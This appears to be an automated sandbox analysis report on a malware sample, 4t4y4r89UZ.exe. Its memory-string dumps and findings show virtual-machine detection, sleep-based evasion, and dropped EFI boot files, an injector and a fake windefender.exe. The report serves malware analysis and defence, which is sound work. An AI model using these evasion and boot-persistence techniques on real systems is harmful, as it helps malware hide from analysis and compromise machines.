EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESIHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXECTFMON.EXESHAREDINTAPP.EXEEXPLORER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESEARCHUI.EXESEARCHUI.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEHXTSR.EXEHXTSR.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXE4T4Y4R89UZ.EXESHAREDINTAPP.EXE[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESPOOLSV.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE4T4Y4R89UZ.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3VPCUHUB$
Source: csrss.exe Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXESVCHOST.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESIHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECTFMON.EXEVMSRVC.EXEVMUSRVC.EXEEXPLORER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXE$
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXESVCHOST.EXESPOOLSV.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESIHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXECTFMON.EXEEXPLORER.EXESVCHOST.EXEDLLHOST.EXESEARCHUI.EXESEARCHUI.EXESVCHOST.EXEHXTSR.EXEHXTSR.EXE
Source: csrss.exe Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE@
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy) Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Windows\windefender.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy) Jump to dropped file
Is looking for software installed on the system
Source: C:\Windows\rss\csrss.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: VBoxGuest Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: vmci Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: HGFS Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: VBoxTrayIPC Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: \pipe\VBoxTrayIPC Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: VBoxMiniRdrDN Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information queried: ProcessInformation Jump to behavior
Source: csrss.exe Binary or memory string: derivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousev
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps
Source: csrss.exe Binary or memory string: ayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: vmusrvc.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: csrss.exe Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: svchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exe$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exevmmouse$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: qemuvirtual
Source: csrss.exe Binary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exe
Source: csrss.exe Binary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: smss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exeUsoClient.exeusoclient.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe4t4y4r89uz.exevmci$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: GPU3LFU_3R1CloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
Source: csrss.exe Binary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
Source: csrss.exe Binary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: csrss.exe Binary or memory string: licesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DYOR-
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: 11VBoxSFVT(%d)WINDIRWib
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: systemvboxtray.exe
